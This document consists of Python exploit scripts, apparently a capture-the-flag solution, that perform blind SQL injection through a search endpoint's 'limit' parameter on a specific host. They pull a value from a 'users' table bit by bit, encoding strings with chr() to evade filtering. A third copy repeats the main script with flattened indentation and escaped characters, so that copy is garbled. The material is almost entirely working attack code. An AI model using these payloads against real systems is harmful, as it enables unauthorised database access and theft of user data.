st98/exp.py

## exp.py
import json
import requests
import urllib.parse

def f(s):
  return 'chr(' + ')||chr('.join(str(ord(c)) for c in s) + ')'

ip = f('::ffff:(IP address)')

res = ''
for i in range(1, 32 + 1):
  c = 0
  for j in range(4):
    payload = f'1-(select 1 from (select * from users as t(a,b,c) where c = {ip} limit 1) as tt(x,y,z) where (((chr(120)||substr(y, {i}, 1))::bit(4)::int) & (1 << {j})) > 0)'
    r = requests.get('http://mashiro.kr:13000/search?limit=' + urllib.parse.quote(payload))
    l = len(json.loads(r.content)['items'])

    if l == 0:
      c |= 1 << j
  res += hex(c)[2:]
  print(i, repr(res))

## exp_old.py
import json
import requests
import urllib.parse

def f(s):
  return 'chr(' + ')||chr('.join(str(ord(c)) for c in s) + ')'

ip = f('::ffff:(IP address)')

res = ''
for i in range(1, 32 + 1):
  c = 0
  for j in range(3):
    payload = f'(select (ascii(substr(y, {i}, 1)) & (7 << {j * 3})) >> {j * 3} from (select * from users as t(a,b,c) where c = {ip} limit 1) as tt(x,y,z))'
    r = requests.get('http://mashiro.kr:13000/search?limit=' + urllib.parse.quote(payload))
    l = len(json.loads(r.content)['items'])

    if l == 8:
      l = 0

    c |= l << (j * 3)
  res += chr(c)
  print(i, repr(res))
	import json
	import requests
	import urllib.parse

	def f(s):
	return 'chr(' + ')\|\|chr('.join(str(ord(c)) for c in s) + ')'

	ip = f('::ffff:(IP address)')

	res = ''
	for i in range(1, 32 + 1):
	c = 0
	for j in range(4):
	payload = f'1-(select 1 from (select * from users as t(a,b,c) where c = {ip} limit 1) as tt(x,y,z) where (((chr(120)\|\|substr(y, {i}, 1))::bit(4)::int) & (1 << {j})) > 0)'
	r = requests.get('http://mashiro.kr:13000/search?limit=' + urllib.parse.quote(payload))
	l = len(json.loads(r.content)['items'])

	if l == 0:
	c \|= 1 << j
	res += hex(c)[2:]
	print(i, repr(res))